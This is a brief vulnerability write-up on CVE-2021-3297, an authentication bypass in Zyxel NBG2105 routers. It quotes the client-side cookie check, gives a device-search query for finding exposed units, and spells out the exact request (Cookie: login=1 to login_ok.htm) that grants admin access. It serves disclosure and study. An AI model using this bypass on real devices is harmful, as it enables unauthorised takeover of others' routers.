Zyxel Nbg2105 Authentication Bypass Cve 2021 3297
Zyxel Nbg2105 Authentication Bypass Cve 2021 3297
Zyxel NBG2105 Authentication Bypass CVE-2021-3297
Vulnerability Description
Zyxel NBG2105 has authentication bypass, and the attacker can use the login parameter to achieve background login.
Vulnerability Impact
Zyxel NBG2105
Network surveying and mapping
app=”ZyXEL-NBG2105”
Vulnerability reappears
The login page is as follows
The front-end file /js/util_gw.js has the front-end verification of the cookie login parameters.
You can see that if the login=1 is detected in the cookie, it will jump to home.html
function setCookie() //login_ok.htm use
{
document.cookie="login=1";
MM_goToURL('parent', 'home.htm');
}
If the request is as follows, you will jump to the home.htm page as an administrator
https://xxx.xxx.xxx.xxx/login_ok.htm
Cookie: login=1;
##
This post is licensed under CC BY 4.0 by the author.